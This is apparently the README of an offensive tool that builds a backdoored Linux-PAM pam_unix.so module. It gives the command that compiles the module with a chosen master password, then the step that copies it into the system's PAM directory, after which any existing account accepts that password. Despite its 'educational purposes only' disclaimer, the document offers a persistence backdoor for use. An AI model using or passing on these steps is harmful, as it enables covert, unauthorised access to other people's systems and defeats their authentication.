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# linux-pam-backdoor
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Linux PAM Backdoor
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# linux-pam-backdoor
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Linux PAM Backdoor
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This script automates the creation of a backdoor for Linux-PAM (Pluggable Authentication Modules)
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## Usage
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To generate the backdoored pam_unix.so, just run:
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```
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./backdoor.sh -v 1.3.0 -p som3_s3cr4t_p455w0rd
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```
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You have to identify the PAM version installed on the system, to make sure the script will compile the right version. Otherwise you can break the whole system authentication.
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After the execution of the script, the last step is to copy the generated pam_unix.so to the pam modules dir on the host.
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```
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cp pam_unix.so /usr/lib/security/
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```
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That's all.
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After that, you can log-in to the system using an existing user, and the previously configured password.
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Use this for educational purposes only.
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I am not responsible for the damage you might cause.
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